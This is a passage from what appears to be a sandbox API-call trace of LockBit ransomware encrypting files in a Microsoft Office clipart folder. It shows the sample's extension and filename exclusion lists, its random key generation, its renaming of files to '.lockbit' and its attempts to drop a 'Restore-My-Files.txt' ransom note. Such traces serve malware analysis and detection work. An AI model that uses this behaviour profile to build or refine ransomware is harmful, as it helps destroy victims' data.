-1 [0173.709] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.709] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.709] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.710] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.710] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.710] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.710] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.710] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.710] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.710] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.710] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.710] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.710] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SL00260_.WMF") returned -1 [0173.710] lstrcmpiW (lpString1="ntldr", lpString2="SL00260_.WMF") returned -1 [0173.710] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SL00260_.WMF") returned -1 [0173.710] lstrcmpiW (lpString1="bootsect.bak", lpString2="SL00260_.WMF") returned -1 [0173.710] lstrcmpiW (lpString1="autorun.inf", lpString2="SL00260_.WMF") returned -1 [0173.710] lstrcmpiW (lpString1="thumbs.db", lpString2="SL00260_.WMF") returned 1 [0173.710] lstrcmpiW (lpString1="iconcache.db", lpString2="SL00260_.WMF") returned -1 [0173.710] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.710] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00260_.WMF") returned=".WMF" [0173.710] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.710] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.710] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.710] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.710] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.710] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.710] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.710] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.710] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.711] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.711] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.711] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.711] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.711] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.711] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.711] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.711] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.711] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.711] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.711] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.711] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.711] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.711] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.711] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.711] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.711] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.711] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.711] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.711] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00260_.WMF.lockbit") returned 72 [0173.711] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00260_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00260_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0173.712] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.712] malloc (_Size=0x40068) returned 0x1ff1e60 [0173.712] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=31908) returned 1 [0173.712] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0173.713] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0173.713] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.717] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00260_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00260_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.717] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.717] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.718] free (_Block=0x1fa2ed8) [0173.718] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00260_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.718] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.718] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.718] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33e6bb00, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x33e6bb00, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0xf5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SL00268_.WMF", cAlternateFileName="")) returned 1 [0173.718] lstrcmpiW (lpString1=".", lpString2="SL00268_.WMF") returned -1 [0173.718] lstrcmpiW (lpString1="..", lpString2="SL00268_.WMF") returned -1 [0173.718] PathFindExtensionW (pszPath="SL00268_.WMF") returned=".WMF" [0173.718] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.718] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.718] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.718] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.718] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.718] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.718] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.718] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.719] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.719] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.720] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.720] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.720] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.720] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.720] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.720] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.720] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.720] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.720] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.720] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.720] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.720] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.720] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.720] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.720] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SL00268_.WMF") returned -1 [0173.720] lstrcmpiW (lpString1="ntldr", lpString2="SL00268_.WMF") returned -1 [0173.720] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SL00268_.WMF") returned -1 [0173.720] lstrcmpiW (lpString1="bootsect.bak", lpString2="SL00268_.WMF") returned -1 [0173.720] lstrcmpiW (lpString1="autorun.inf", lpString2="SL00268_.WMF") returned -1 [0173.720] lstrcmpiW (lpString1="thumbs.db", lpString2="SL00268_.WMF") returned 1 [0173.720] lstrcmpiW (lpString1="iconcache.db", lpString2="SL00268_.WMF") returned -1 [0173.720] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.720] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00268_.WMF") returned=".WMF" [0173.720] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.721] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.721] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.722] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00268_.WMF.lockbit") returned 72 [0173.722] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00268_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00268_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0173.722] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.722] malloc (_Size=0x40068) returned 0x3ef0008 [0173.722] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=3932) returned 1 [0173.722] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.723] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0173.723] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.723] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0173.724] ReadFile (in: hFile=0x338, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0173.727] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00268_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00268_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.728] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.728] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.729] free (_Block=0x1fa2ed8) [0173.729] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00268_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.729] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.729] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.729] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7c59500, ftCreationTime.dwHighDateTime=0x1bd4b2e, ftLastAccessTime.dwLowDateTime=0x5a980590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb7c59500, ftLastWriteTime.dwHighDateTime=0x1bd4b2e, nFileSizeHigh=0x0, nFileSizeLow=0x1dac, dwReserved0=0x0, dwReserved1=0x0, cFileName="SL00286_.WMF", cAlternateFileName="")) returned 1 [0173.729] lstrcmpiW (lpString1=".", lpString2="SL00286_.WMF") returned -1 [0173.729] lstrcmpiW (lpString1="..", lpString2="SL00286_.WMF") returned -1 [0173.729] PathFindExtensionW (pszPath="SL00286_.WMF") returned=".WMF" [0173.729] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.729] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.729] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.729] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.729] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.729] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.729] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.730] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.730] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SL00286_.WMF") returned -1 [0173.731] lstrcmpiW (lpString1="ntldr", lpString2="SL00286_.WMF") returned -1 [0173.731] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SL00286_.WMF") returned -1 [0173.731] lstrcmpiW (lpString1="bootsect.bak", lpString2="SL00286_.WMF") returned -1 [0173.731] lstrcmpiW (lpString1="autorun.inf", lpString2="SL00286_.WMF") returned -1 [0173.731] lstrcmpiW (lpString1="thumbs.db", lpString2="SL00286_.WMF") returned 1 [0173.731] lstrcmpiW (lpString1="iconcache.db", lpString2="SL00286_.WMF") returned -1 [0173.731] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.731] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00286_.WMF") returned=".WMF" [0173.731] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.731] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.731] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.732] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.732] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00286_.WMF.lockbit") returned 72 [0173.732] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00286_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00286_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0173.737] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.737] malloc (_Size=0x40068) returned 0x3d70450 [0173.737] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=7596) returned 1 [0173.737] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.738] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0173.738] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.738] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0173.738] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0173.740] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft 